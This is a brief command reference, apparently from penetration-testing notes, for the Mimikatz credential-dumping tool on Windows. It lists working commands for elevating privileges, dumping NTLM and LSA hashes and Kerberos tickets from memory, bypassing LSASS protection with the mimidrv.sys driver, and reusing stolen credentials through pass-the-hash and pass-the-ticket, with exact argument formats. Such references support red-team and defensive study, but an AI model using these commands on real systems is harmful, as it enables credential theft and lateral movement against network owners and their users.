Mimikatz is a tool for dumping and using cached credentials on a compromised machine. High integrity or SYSTEM privileges required for most commands.
Usage
Acquiring Privilege
privilege::debug
(try to enable SeDebugPrivilege; needed for elevation)token::elevate
(try to elevate from high integrity to SYSTEM, if not already)
Dumping Credentials
lsadump::sam
(dump cached NTLM hashes from LSASS; local users only)lsadump::lsa [ /patch | /inject ]
(dump LSA hashes, use patch on a workstation to dump NT hashes and inject on a DC to dump additional keys; patch refers to memory patching, see this article)sekurlsa::logonpasswords
(dump all logged on users’ password hash, including remote users’)- If LSASS Protection is enabled, install the mimidrv.sys file as a service.
sekurlsa::msv
(dumps local and domain user cached hashes)kerberos::list /export
(dump Kerberos tickets)sekurlsa::tickets /export
(dump cached tickets; in the output, “TGT” means ticket-granting ticket, “TGS” means ticket-granting service-ticket)sekurlsa::ekeys
(dumps cached encryption keys for Kerberos authentication; debug required)
Using Credentials
sekurlsa::pth
(pass-the-hash)- Format:
sekurlsa::pth /user:DOMAIN_USER /domain:DOMAIN /ntlm:NTLM_HASH /run:COMMAND
- Run with unelevated privileges (use
token::revert
). pass-the-hash with an elevated token does not work.
- Format:
kerberos::ptt TICKET.kirbi
(inject ticket into memory; elevated privilege not necessary)
Miscellaneous
kerberos::purge
(get rid of tickets in the current session)